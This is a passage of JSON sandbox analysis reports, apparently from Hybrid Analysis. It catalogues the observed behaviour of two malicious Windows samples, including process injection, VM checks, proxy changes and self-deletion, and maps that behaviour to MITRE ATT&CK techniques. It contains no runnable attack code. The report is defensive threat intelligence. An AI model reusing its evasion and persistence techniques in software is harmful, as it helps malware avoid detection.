\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: vxdmon.exe]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: VXDMON.EXE.67A9C45E.bin]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" opened \"\\Device\\KsecDD\"\n \"vxdmon.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" claims program is from Thu Jan 1 15:30:08 1970\n \"vxdmon.exe\" claims program is from Thu Jan 1 15:30:08 1970\n \"VXDMON.EXE.67A9C45E.bin\" claims program is from Thu Jan 1 15:30:08 1970", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has an entrypoint in section \"UPX0\"\n \"vxdmon.exe\" has an entrypoint in section \"UPX0\"\n \"VXDMON.EXE.67A9C45E.bin\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"vxdmon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\vxdmon.exe]- [targetUID: 00000000-00006064]\n \"VXDMON.EXE.67A9C45E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vxdmon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\vxdmon.exe]- [targetUID: 00000000-00006064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has section name UPX0 with entropy \"6.33637327379\"\n \"vxdmon.exe\" has section name UPX0 with entropy \"6.33637327379\"\n \"VXDMON.EXE.67A9C45E.bin\" has section name UPX0 with entropy \"6.33637327379\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2845.bat\" \"\" (UID: 00000000-00004016)\n Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2564.bat\" \"\" (UID: 00000000-00004232)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"vxdmon.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")\n \"vxdmon.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"vxdmon.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"vxdmon.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\r2845.bat (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\r2564.bat (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (UID: 00000000-00006060)\n Spawned process \"vxdmon.exe\" with commandline \"\\\\vxdmon.exe\" (UID: 00000000-00006064)\n Spawned process \"vxdmon.exe\" (UID: 00000000-00006048)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2845.bat\" \"\" (UID: 00000000-00004016)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2564.bat\" \"\" (UID: 00000000-00004232)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" wrote 32 bytes to a remote process \"C:\\vxdmon.exe\" (Handle: 396)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" wrote 52 bytes to a remote process \"C:\\vxdmon.exe\" (Handle: 396)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" wrote 4 bytes to a remote process \"C:\\vxdmon.exe\" (Handle: 396)\n \"vxdmon.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\vxdmon.exe\" (Handle: 468)\n \"vxdmon.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\vxdmon.exe\" (Handle: 468)\n \"vxdmon.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\vxdmon.exe\" (Handle: 468)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" allocated memory in \"C:\\82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "registry-56", "type": 3, "relevance": 5, "name": "Reads the registry for VMWare specific artifacts", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")\n \"vxdmon.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927
https://hybrid-analysis.com/sample/0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927
Hybrid Analysis - Killers
{"size": 11808768, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927", "sha256": "0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927", "av_detect": 89, "vx_family": "Pykspa.Generic", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 127, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 7.10 (Visual Studio .NET 2003) (build: 3077)", "56 .CPP Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)"], "imported_objects": ["13 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2179)", "2 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2067)", "2 .LIB Files generated with LIB.EXE 7.00 (Visual Studio .NET 2002) (build: 9210)", "99 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)", "25 .ASM Files assembled with MASM 7.10 (Visual Studio .NET 2002) (build: 3077)", "3 .OBJ Files linked with ALIASOBJ.EXE 7.10 BETA (Internal OLDNAMES.LIB Tool) (build: 2067)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (56 files)"], "total_file_compositions_imports": 225}, "processes": [{"uid": "00000000-00006048", "name": "0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe", "normalized_path": "C:\\0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe", "sha256": "0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 3}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 19}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": 